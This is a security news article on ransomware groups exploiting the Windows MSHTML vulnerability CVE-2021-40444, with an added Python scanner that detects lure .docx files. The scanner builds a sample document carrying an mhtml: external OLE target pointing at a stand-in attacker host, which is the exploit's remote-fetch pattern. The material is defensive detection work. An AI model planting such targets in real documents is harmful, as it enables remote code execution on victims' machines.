Microsoft says that multiple threat actors, including ransomware gangs, are exploiting the Windows MSHTML remote code execution (RCE) vulnerability that the company recently patched.
Exploitation of this vulnerability (CVE-2021-40444) began on August 18, roughly three weeks before Microsoft published a security advisory about the issue.
According to telemetry analyzed by the Microsoft 365 Defender Threat Intelligence Team and the Microsoft Threat Intelligence Center (MSTIC), the small number of initial attacks (fewer than 10) used malicious Office documents.
These attacks used CVE-2021-40444 "as part of an initial access campaign distributing custom Cobalt Strike Beacon loaders".
The Beacons, deployed on the network of at least one victim, communicated with malicious infrastructure linked to multiple cybercrime campaigns, including ransomware groups.
Some of the Cobalt Strike infrastructure used in the August attacks had also been used in the past to distribute BazaLoader and Trickbot payloads.
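A practical check for the delivery vehicle described above, as an added example that is not part of the original article or of Microsoft's tooling: the CVE-2021-40444 lure documents carried an external OLE-object relationship in word/_rels/document.xml.rels whose target uses the mhtml: scheme (a detail Microsoft described publicly). The script below builds a minimal .docx in memory and scans every .rels part for that pattern. The domain attacker.invalid, the part contents and the severity labels are constructed for the example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship type that Word uses for embedded OLE objects.
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def scan_docx(docx_bytes):
    """Scan every .rels part in a .docx for external OLE object relationships.

    Returns a list of dicts. An external oleObject whose target uses the
    mhtml: scheme is the CVE-2021-40444 pattern and is rated 'high'; any other
    external oleObject is still unusual for a document and is rated 'medium'.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(part))
            except ET.ParseError:
                continue  # a malformed part is not evidence by itself
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("TargetMode") != "External":
                    continue
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                target = rel.get("Target", "")
                severity = "high" if target.lower().startswith("mhtml:") else "medium"
                findings.append({"part": part, "id": rel.get("Id"),
                                 "target": target, "severity": severity})
    return findings


def build_sample_docx(ole_target=None):
    """Build a minimal .docx in memory (constructed test data, not a real
    sample). If ole_target is given, add an external oleObject relationship
    pointing at it, which is how the CVE-2021-40444 documents pulled in the
    remote HTML."""
    rels = ['<?xml version="1.0" encoding="UTF-8"?>',
            '<Relationships xmlns="%s">' % RELS_NS,
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
            'officeDocument/2006/relationships/styles" Target="styles.xml"/>']
    if ole_target is not None:
        rels.append('<Relationship Id="rId5" Type="%s" Target="%s" '
                    'TargetMode="External"/>' % (OLE_REL_TYPE, ole_target))
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/styles.xml", "<w:styles/>")
        z.writestr("word/_rels/document.xml.rels", "\n".join(rels))
    return buf.getvalue()


# Constructed indicator: the exploit documents used an mhtml: URL with the
# x-usc: prefix so that Word fetches the remote HTML through MSHTML.
MALICIOUS_TARGET = ("mhtml:http://attacker.invalid/side.html"
                    "!x-usc:http://attacker.invalid/side.html")

if __name__ == "__main__":
    for label, doc in (("clean", build_sample_docx()),
                       ("malicious", build_sample_docx(MALICIOUS_TARGET))):
        print(label, scan_docx(doc))
```

Point the scanner at mail-gateway or endpoint quarantine samples by passing the raw file bytes to scan_docx; a "medium" hit on a plain external OLE target is worth a look, while an mhtml: target is the specific CVE-2021-40444 pattern.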
Ransomware gangs exploit Windows MSHTML vulnerability after public disclosure
Microsoft observed a sharp increase in exploitation attempts within 24 hours of publishing the CVE-2021-40444 advisory.
"Following the disclosure, Microsoft observed multiple threat actors, including ransomware-as-a-service affiliates, adopting proof-of-concept code into their toolkits," the researchers added.
Microsoft continues to monitor the situation and to work on protecting customers.
MSTIC threat intelligence analyst Justin Warner said that other threat groups will add CVE-2021-40444 exploits to their arsenals in the coming days and weeks.
Microsoft recommends installing this month's Patch Tuesday security updates immediately to fix the Windows MSHTML vulnerability and block these attacks.
CVE-2021-40444 affects systems running Windows Server 2008 through 2019 and Windows 8.1 or later. It has a CVSS severity score of 8.8 out of 10.
Security updates released by Microsoft address vulnerabilities in all affected versions of Windows.
Those who cannot install the update right away can apply the mitigations proposed by Microsoft (disabling ActiveX controls in Internet Explorer for all zones via the registry, and disabling document preview in Windows Explorer), which only partially reduce the risk.
Source: Bleeping Computer